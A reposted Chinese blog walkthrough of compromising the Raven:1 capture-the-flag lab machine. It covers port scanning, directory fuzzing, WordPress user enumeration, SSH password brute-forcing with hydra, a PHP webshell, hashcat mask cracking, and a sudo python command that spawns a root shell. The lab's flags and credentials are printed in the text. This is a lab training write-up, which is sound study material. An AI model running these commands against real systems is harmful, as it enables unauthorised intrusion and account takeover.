【转】渗透测试实战-Raven：靶机入侵（修改版）

野性酷女 2022-03-15 00:10 301阅读 0赞

分享到： ![QQ空间][QQ] ![新浪微博][t01f0d8694dda79069d.png] ![微信][t01e29062a5dcd13c10.png] ![QQ][QQ 1] ![facebook][] ![twitter][]

[![t017e9184f513b589d4.jpg][]][t017e9184f513b589d4.jpg]

## 前言 ##

大家好！爱写靶机渗透文章的我又来了，该靶机被设计者定义为初级-中级，最后小弟完成整个渗透的时候也的确是比较简单的；但是中间设计者设计了一个坑，小弟在那里被困了好几天，都塌喵的开始怀疑人生了。下面会介绍，本靶机设计者一共设置了4个flag，本次入侵也已拿到4个flag和root权限为止。

## 靶机安装/下载 ##

Raven：1靶机下载：[https://pan.baidu.com/s/18p0Jir7eH0BL1Na\_6ybRtg][https_pan.baidu.com_s_18p0Jir7eH0BL1Na_6ybRtg]  
靶机IP: 172.16.24.37

[![t01699418a8ee170e4c.png][]][t01699418a8ee170e4c.png]

## 实战 ##

第一步老规矩探测ip：

[![t01be861277f950a82c.png][]][t01be861277f950a82c.png]

已经知道了ip，下一步就是使用nmap探测靶机开放的端口了，如图：

[![t0198c3c213ed05323b.png][]][t0198c3c213ed05323b.png]

通过上面的端口探测可以看到，该靶机开放了多个端口，我们还是老规矩以80端口作为突破口

[![t0156d3ec883d8aa9b2.png][]][t0156d3ec883d8aa9b2.png]

下一步进行目录猜解，本次使用gobuster 工具完成

[![t01969899ed5947a9f8.png][]][t01969899ed5947a9f8.png]

**这里gobuster大多数kali并不是自带了，所以我用了wfuzz**

**，具体指令**

**wfuzz -c --hc 404 -w /root/mine/wordlists/dirbuster/directory-list-2.3-medium.txt  192.168.1.101/FUZZ  
过滤404页面，还需要指定一个字典。**

我们在 [http://172.16.24.37/service.html][http_172.16.24.37_service.html] 拿到了第一个flag，在源代码262行处，如图：

[![t0194c98751321bca82.png][]][t0194c98751321bca82.png]

flag1\{b9bbcb33e11b80be759c4e844862482d\}

通过刚刚的目录猜解，我在/vendor目录下发现了 PHPMailerAutoload.php，通过搜索发现存在一个PHPmailer的任意命令执行漏洞，然后小弟就一顿操作一顿修改exp，

[![t011b27d499e624cda8.png][]][t011b27d499e624cda8.png]

（注：这里的绝对路径在[http://172.16.24.37/vendor/PATH][http_172.16.24.37_vendor_PATH] ）

[![t01017401cb6be52b83.png][]][t01017401cb6be52b83.png]

小弟还不死心，直接手动测试，如图：

[![t018b4631ac76d34ca2.png][]][t018b4631ac76d34ca2.png]

依然出错，在这里小弟被卡了好几天，一度怀疑是不是靶机设计者设计错了，最后忘记是用哪款扫描器，扫描到了zip文件，地址：[http://172.16.24.37/contact.zip][http_172.16.24.37_contact.zip] ，下载来后通过查看源代码发现，该源码里写入的地址是错的，这也就说我一直没法利用该漏洞的原因，如图：

[![t0102d30fb8935b10e3.png][]][t0102d30fb8935b10e3.png]

最后小弟把目光放在/wordpress 上，老规矩使用wpsan怼一波，如图：

**wpscan用的时候会报错，因为需要指定参数**

**这里的用法如下**

**wpscan --url 192.168.1.101/wordpress  --wp-content-dir /wordpress --enumerate u**

[![t01aa7c4b8c9dcbb102.png][]][t01aa7c4b8c9dcbb102.png]

未发现可利用漏洞，但是出来2个账户“michael”、“steven”

下面我们加载这2个账户来破解其ssh密码，各位也可以使用msf来完成

小弟这里使用hydra：

[![t0176cbf92370feec11.png][]][t0176cbf92370feec11.png]

破解出来密码：“michael”、“michael”

即能成功登陆ssh，

[![t01dff969b6c3ac7df7.png][]][t01dff969b6c3ac7df7.png]

下一步就是拿flag了，flag2在 /var/www/ 目录下，如图：

[![t0180de090abcd2164d.png][]][t0180de090abcd2164d.png]

flag2\{fc3fd58dcdad9ab23faca6e9a36e581c\}

下面为了演示方便，小弟上了一个php大马在/wordpress目录下，

[![t0146b7117f84e8c93b.png][]][t0146b7117f84e8c93b.png]

下一步就是提权了，在/wordpress/wp\_config.php 里拿到mysql的账户密码，如图：

[![t01d2babc49a281067d.png][]][t01d2babc49a281067d.png]

mysql账户密码为：“root”、“R[@v3nSecurity][v3nSecurity]”

到了这里肯定要小伙伴要问了，前面端口探测不是看到靶机没开3306端口吗？其实它只是为了防止外部访问罢了，我们使用shell查看，即可知道，如图：

[![t01e97b1d79b5deac60.png][]][t01e97b1d79b5deac60.png]

下面肯定是通过mysql提权啊，我们使用php大马来操作mysql，方便大家阅读

[![t0133a725ac97b43d09.png][]][t0133a725ac97b43d09.png]

[![t0184f83884068b450d.png][]][t0184f83884068b450d.png]

拿到了flag3\{afc01ab56b50591e7dccf93122770cd2\}

小弟也在/tmp目录下，上传了一个提权辅助脚本，命令：

wget https://www.securitysift.com/download/linuxprivchecker.py

[![t014157f91c260123a0.png][]][t014157f91c260123a0.png]

通过提权脚本我们可以看到，我们可以使用mysql来完成提权，该方法的提权具体操作，见代码注释处，如图：

[![t01a4fb959b0532af28.png][]][t01a4fb959b0532af28.png]

脚本地址：[https://www.exploit-db.com/exploits/1518/][https_www.exploit-db.com_exploits_1518]

小弟这里使用另外一种方法提权，刚刚我们已经得到了另外一个账户“steven”的hash值，下一步我们破解这个hash

得到破解密码：pink84

**这个地方卡了我一天，因为我用hashcat指定md5解密并没有hash值存在，最后偶然发现了hashcat的help中**

**有一个例子，使用的$P$加密，方式是400，我就用这个最后解密。hashcat的指令为**

** .\\hashcat64.exe -a 3 -m 400 --increment --increment-min 1 --increment-max 8 -2 ?l?d X:\\ExtraSoftware\\hash.txt ?2?2?2?2?2?2?2?2 -O --force**

**1-8位字母数字掩码攻击  （仅供参考）**

下面我们切换到steven账户

[![t01904bc71f941a2e0c.png][]][t01904bc71f941a2e0c.png]

下一步输入命令：sudo -l

[![t01f9b04450a61070c4.png][]][t01f9b04450a61070c4.png]

可以看到python，可以直接绕过root，下面只需要输入命令

sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’

[![t014cd9f158b9be4a30.png][]][t014cd9f158b9be4a30.png]

成功拿到flag和root\_shell

最后root的密码并没有跑出来，各位可以尝试跑一下，用上面的指令，不过root的密码应该不会特别简单，应该会有大小写符号数字组成，所以还是不建议跑了。

## 总结 ##

通过这篇文章小伙伴们应该也看到了，该靶机其实挺简单的，但是小弟在前面被不知是设计者的故意挖坑还是失望留的坑，困了好几天，一直无法突破。所以说小伙伴们以后在真实环境中如果碰到无法突破的点，可以先试着跳出来看看其他的是否有突破口呐？

最后祝大家生活愉快，感谢观看！

转载出处： [https://www.anquanke.com/post/id/163996][https_www.anquanke.com_post_id_163996]

[QQ]: https://p0.ssl.qhimg.com/sdm/28_28_100/t014ba42aad7714178d.png
[t01f0d8694dda79069d.png]: https://p0.ssl.qhimg.com/sdm/28_28_100/t01f0d8694dda79069d.png
[t01e29062a5dcd13c10.png]: https://p0.ssl.qhimg.com/sdm/28_28_100/t01e29062a5dcd13c10.png
[QQ 1]: https://p0.ssl.qhimg.com/sdm/28_28_100/t010d95bee6ba3edf60.png
[facebook]: https://p0.ssl.qhimg.com/sdm/28_28_100/t01a5e75c16cffcb0ba.png
[twitter]: /images/20220315/91fa28470f124eea899470d331b02af6.png
[t017e9184f513b589d4.jpg]: /images/20220315/fb3cd93379bb4f2880b3440658a45092.png
[https_pan.baidu.com_s_18p0Jir7eH0BL1Na_6ybRtg]: https://pan.baidu.com/s/18p0Jir7eH0BL1Na_6ybRtg
[t01699418a8ee170e4c.png]: /images/20220315/b5f7cf103c304bdcaa55fbe60a58cc09.png
[t01be861277f950a82c.png]: /images/20220315/d25780836a7142f7a388fc31f2209435.png
[t0198c3c213ed05323b.png]: /images/20220315/5c0391584a2648c984192b57aa8e7518.png
[t0156d3ec883d8aa9b2.png]: /images/20220315/d79dd1adde7e4053bf38d7b57212b4fd.png
[t01969899ed5947a9f8.png]: /images/20220315/eb5a6eaaf0564954b1f449310871158a.png
[http_172.16.24.37_service.html]: http://172.16.24.37/service.html
[t0194c98751321bca82.png]: /images/20220315/608c38729e854adc81c468e40810bb56.png
[t011b27d499e624cda8.png]: /images/20220315/6db49633c17e41468c92d19ae34a618b.png
[http_172.16.24.37_vendor_PATH]: http://172.16.24.37/vendor/PATH
[t01017401cb6be52b83.png]: /images/20220315/cfe49152dc50499f96384ed94f9aed49.png
[t018b4631ac76d34ca2.png]: /images/20220315/3db1a0133bca401ea83bf3582a114735.png
[http_172.16.24.37_contact.zip]: http://172.16.24.37/contact.zip
[t0102d30fb8935b10e3.png]: /images/20220315/eba2e84dc56249cd88146a5d353bc430.png
[t01aa7c4b8c9dcbb102.png]: /images/20220315/bf1deccd8add4c218d33f50e163bcfa3.png
[t0176cbf92370feec11.png]: /images/20220315/81980148c15d4c2fba62651855a4d443.png
[t01dff969b6c3ac7df7.png]: /images/20220315/7c0b4167ee8e49a8ad178529a86ab109.png
[t0180de090abcd2164d.png]: /images/20220315/640215418fc245b08d4cd96e83b8989d.png
[t0146b7117f84e8c93b.png]: /images/20220315/aa18d7dc83b6409c8d7baa8b28a18f84.png
[t01d2babc49a281067d.png]: /images/20220315/066daeb868ef452aac47ef843cf4b383.png
[v3nSecurity]: https://github.com/v3nSecurity
[t01e97b1d79b5deac60.png]: /images/20220315/5c541f7b4e214fd188370ef81314cd3d.png
[t0133a725ac97b43d09.png]: /images/20220315/01ffab7e93e34c27abe5cca5f8be0a72.png
[t0184f83884068b450d.png]: /images/20220315/a071fedcb8694c14aeb5876cf64fb4d5.png
[t014157f91c260123a0.png]: /images/20220315/de19eb3d9ea24b62ba8af6e33b6acb25.png
[t01a4fb959b0532af28.png]: /images/20220315/018d6c332678424a8c190c3802dcfb8a.png
[https_www.exploit-db.com_exploits_1518]: https://www.exploit-db.com/exploits/1518/
[t01904bc71f941a2e0c.png]: /images/20220315/f1a0c5ada1894a5586337014a12cbb10.png
[t01f9b04450a61070c4.png]: /images/20220315/4c07f8a80b0b4258ab3f3101f918318e.png
[t014cd9f158b9be4a30.png]: /images/20220315/f1770f4655f24cfe942df85f1b3cdafc.png
[https_www.anquanke.com_post_id_163996]: https://www.anquanke.com/post/id/163996